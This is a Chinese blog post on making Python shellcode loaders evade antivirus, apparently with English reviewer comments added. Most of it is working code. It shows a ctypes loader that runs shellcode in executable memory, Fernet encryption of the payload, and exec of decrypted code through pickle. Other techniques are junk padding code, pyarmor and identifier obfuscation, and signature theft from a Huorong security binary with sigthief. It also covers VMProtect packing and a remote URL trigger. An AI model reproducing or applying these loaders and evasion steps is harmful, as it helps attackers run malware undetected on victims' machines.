• python免杀初探


    loader基础知识

    loader

    import ctypes
    # NOTE(review): the minimal in-process loader from the post. The sequence
    # below — RWX allocation, copy, CreateThread on the buffer, wait — is the
    # textbook pattern that AV/EDR memory scanning commonly flags; the post itself
    # reports that the pyinstaller build of this file fails even static scanning.
    # Placeholder for the raw shellcode bytes (the post generates them on Kali).
    shellcode = bytearray(b"shellcode")
    # Declare VirtualAlloc's return type as 64-bit so the returned pointer is not
    # truncated to ctypes' default C int on x64.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # Allocate memory: lpAddress=NULL, dwSize=len(shellcode),
    # flAllocationType=0x3000 (MEM_COMMIT | MEM_RESERVE),
    # flProtect=0x40 (PAGE_EXECUTE_READWRITE: readable, writable and executable).
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    
    # Copy the shellcode into the allocated region.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr), 
        buf, 
        ctypes.c_int(len(shellcode))
    )
    # Start a thread whose entry point is the first byte of the copied shellcode
    # (the original comment's "防止位置" is a typo for "放置位置", storage location).
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0), 
        ctypes.c_int(0), 
        ctypes.c_uint64(ptr), 
        ctypes.c_int(0), 
        ctypes.c_int(0), 
        ctypes.pointer(ctypes.c_int(0))
    )
    # Block until that thread finishes; -1 is INFINITE (wait without timeout).
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
    

    参数介绍

    # virtualalloc: 申请虚拟内存
    LPVOID VirtualAlloc(
    LPVOID lpAddress,        // 指定要分配的区域的期望起始地址。一般为null
    SIZE_T dwSize,           // 要分配的堆栈大小
    DWORD flAllocationType,  // 类型的分配
    DWORD flProtect          // 内存的执行权限
    );
    // 属性解释
    flAllocationType: 
    MEM_COMMIT: 在内存或磁盘上的分页文件中为指定的内存页区域分配物理存储。该函数将内存初始化为零。(提交到物理内存)
    MEM_RESERVE: 保留一定范围的进程虚拟地址空间,而不在内存或磁盘上的分页文件中分配任何实际物理存储。(保留虚拟内存)
    
    flProtect:
    PAGE_EXECUTE_READWRITE: 内存页分配为可读可写可执行
    PAGE_READWRITE: 内存页分配为可读可写
    
    #RtlMoveMemory: 将一个缓冲区的内容复制到另一个缓冲区。
    VOID RtlMoveMemory(
    IN VOID UNALIGNED  *Destination,   // 要复制到的目标
    IN CONST VOID UNALIGNED  *Source,  // 要转移的内存块
    IN SIZE_T  Length                  // 内存块大小
    );
    
    # CreateThread: 创建线程
    HANDLE CreateThread(
    LPSECURITY_ATTRIBUTES lpThreadAttributes, // 安全属性,一般设置为0或者null 
    SIZE_T dwStackSize,                       // 初始栈大小, 设置为0
    LPTHREAD_START_ROUTINE lpStartAddress,    // 线程函数地址
    LPVOID lpParameter,                       // 线程参数,没传参即为0
    DWORD dwCreationFlags,                    // 创建线程标志,对线程做控制的
    LPDWORD lpThreadId                        // 线程id
    );
    
    # WaitForSingleObject: 等待线程执行完毕
    DWORD WaitForSingleObject(
    HANDLE hHandle,        // 句柄
    DWORD dwMilliseconds   // 等待标志, 常用INFINITE, 即为无限等待线程执行完毕
    );
    

    生成exe

    pyinstaller -F -w a.py
    

    果然烂大街的代码生成的exe连静态都过不了

    evilhiding项目地址

    https://github.com/coleak2021/evilhiding.git
    

    不能免杀了可以提Issues,stars是持续更新的动力,嘻嘻嘻。


    免杀方式

    修改加载器

    import pickle,base64,requests,ctypes
    from cryptography.fernet import Fernet
    
    url=''
    # Filled in by the generator; start() fetches it and passes the response body
    # to doit().
    def doit(sectr):
        """Decrypt a Fernet-encrypted Python source string and execute it.

        sectr: the ciphertext handed over by start() (the body fetched from
        ``url``). ``{key2}`` is a template slot the generator fills with the
        second Fernet key produced in the encryption step. Returns nothing; the
        decrypted source runs for its side effects.
        """
        KEY={key2}
        fernet = Fernet(KEY)
        destr = fernet.decrypt(sectr).decode()
        # __reduce__ returning (exec, (destr,)) makes unpickling call exec(destr):
        # the pickle.loads below is arbitrary code execution of the decrypted text.
        class A(object):
            def __reduce__(self):
                return (exec, (destr,))
    
        ret = pickle.dumps(A())
        # The base64 encode/decode round trip is an identity; ret_decode == ret,
        # so these two lines have no functional effect.
        ret_base64 = base64.b64encode(ret)
        ret_decode = base64.b64decode(ret_base64)
        pickle.loads(ret_decode)
    
    import ctypes
    from cryptography.fernet import Fernet
    # Loader template: {key} and {enstr} are slots the generator fills with the
    # Fernet key and the encrypted shellcode produced in the encryption step.
    KEY={key}
    fernet=Fernet(KEY)
    # The shellcode is decrypted at run time, so the plaintext bytes exist only in
    # memory, not in the file on disk.
    shellcode=fernet.decrypt({enstr})
    
    shellcode = bytearray(shellcode)
    # From here on this is the same loader as in the basics section:
    # 64-bit return type for VirtualAlloc, RWX allocation
    # (0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
    # copy into the region, thread started on the buffer, infinite wait.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(shellcode))
    )
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_uint64(ptr),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    # -1 is INFINITE: wait until the shellcode thread exits.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
    

    花指令

    # Padding code ("花指令"): three unrelated snippets kept as source strings and
    # run via exec. Their results are discarded; they are present only to change
    # the program's shape. t1: quicksort of 59999 random floats.
    t1 ="""
    import random
    
    
    def partition(test_arr, low, high):
       i = (low - 1)  
       pivot = test_arr[high]
    
       for j in range(low, high):
           if test_arr[j] <= pivot:
               i = i + 1
               test_arr[i], test_arr[j] = test_arr[j], test_arr[i]
    
       test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
       return i + 1
    
    
    def quick_sort(test_arr, low, high):
       if low < high:
           pi = partition(test_arr, low, high)
           quick_sort(test_arr, low, pi - 1)
           quick_sort(test_arr, pi + 1, high)
    
    
    test_arr= []
    for i in range(59999):
       test_arr.append(random.random())
    n= len(test_arr)
    quick_sort(test_arr,0, n - 1)
       """
    # t2: a few regex searches and a substitution on fixed strings.
    t2 ="""
    import re
    
    re.search('www','www.runoob.com').span()
    re.search('com','www.runoob.com').span()
    
    line= "Cats are smarter than dogs ok in shakdhaksdas";
    
    searchObj= re.search(r'(.*) are (.*?) .*', line, re.M | re.I)
    
    
    def double(matched):
       value = int(matched.group('value'))
       return str(value * 2)
    
    
    s= 'A23G4HFD567'
    re.sub('(?P\d+)',double, s)
       """
    
    # t3: a base64 encode/decode round trip of a fixed string.
    t3 ="""
    import base64
    
    st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
    res= base64.b64encode(st)
    aaa= res.decode()
    res= base64.b64decode(res)
    bbb= res.decode()
       """
    # Run the filler snippets; nothing they compute is used afterwards.
    exec(t1)
    exec(t2)
    exec(t3)
    

    混淆loader源码

    pyarmor gen a.py

    hunxiao函数

    def hunxiao():
        """Rename the functions defined in b.py to opaque identifiers, in place.

        Collects names from ``def name(`` with a regex, drops names starting with
        ``__`` and the name ``super``, maps each to ``'O'`` plus the last seven
        characters of ``str(hash(name))`` and, if the generated names are all
        distinct, textually replaces ``name(``, ``target=name``, ``global name``
        and ``, name`` throughout the file. Prints the mapping on success or
        ``hash repeat`` on a collision, then writes b.py back. Uses ``re``, which
        is not imported in this excerpt.
        """
        openfile = 'b.py'
        # The read handle is never closed explicitly; it is left to the GC.
        text = open(openfile, encoding='utf-8').read()
        wd_df = re.findall("def (.*?)\\(", text)
        wd_df = list(set(wd_df))
        # NOTE(review): removing from wd_df while iterating over it skips the
        # element that follows each removal, so some filtered names can survive.
        for i in wd_df:
            if i[0:2] == "__":
                wd_df.remove(i)
            if i == 'super':
                wd_df.remove(i)
        idlist = []
        for i in wd_df:
            # str hashes are salted per interpreter process, so the generated
            # identifiers differ from one run to the next.
            idlist.append('O' + str(hash(i))[-7:])
    
        cs = len(wd_df)
        # Only rewrite when no two names collapsed onto the same identifier.
        if cs == len(set(idlist)):
            while cs > 0:
                cs -= 1
                # Plain substring replacement: also matches inside longer
                # identifiers, string literals and comments.
                text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
                text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
                text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
                text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
            print('successful function:', wd_df, '\n', idlist)
        else:
            print('hash repeat')
    
        # b.py is overwritten unconditionally, even on the 'hash repeat' path
        # (then with the unmodified text).
        file_save = open('b.py', 'w', encoding='utf-8')
        file_save.write(text)
        file_save.close()
    

    修改签名

    python sigthief.py -i D:\Huorong\Sysdiag\bin\HipsMain.exe -t HipsMain1.exe -o HipsMain.exe
    

    加壳

    • vmpro

    远程条件触发

    def start():
        try:
            r=requests.get(url)
            a = r.status_code
        except:
            a = 404
            pass
    
        if a == 200:
            doit(r.text)
        else:
    

    修改ico的md5

    # Copy coleak.ico to a millisecond-timestamp-named file with that file name
    # appended as trailing bytes, so the copy's hash differs from the original
    # (section heading: change the ico's MD5). `time` and `os` must be imported
    # elsewhere in the script.
    iconame=f'{int (time.time() *1000)}.ico'
    with open('coleak.ico',"br") as f:
        cont=f.read()
    with open(f'{iconame}',"bw") as f:
        cont+=iconame.encode()
        f.write(cont)
    
    # The copy is deleted again; in this excerpt nothing uses it in between —
    # presumably the build step that consumes it sits here in the full script.
    os.remove(iconame)
    

    加密

    # Build-time encryption step. `shellcode` (the raw payload bytes) and `a`
    # (a source text, presumably the loader template) are defined elsewhere.
    # key / enstr fill the {key} / {enstr} slots of the loader template.
    key = Fernet.generate_key()
    fernet = Fernet(key)
    enstr = fernet.encrypt(shellcode)
    
    # A second, independent key protects the source text; it fills {key2} in doit().
    key2 = Fernet.generate_key()
    fernet2 = Fernet(key2)
    
    # a.txt holds the ciphertext that doit() later decrypts and exec's.
    with open('a.txt', 'bw') as f:
        f.write(fernet2.encrypt(a.encode()))
    
  • 原文地址:https://blog.csdn.net/qq_63701832/article/details/133968257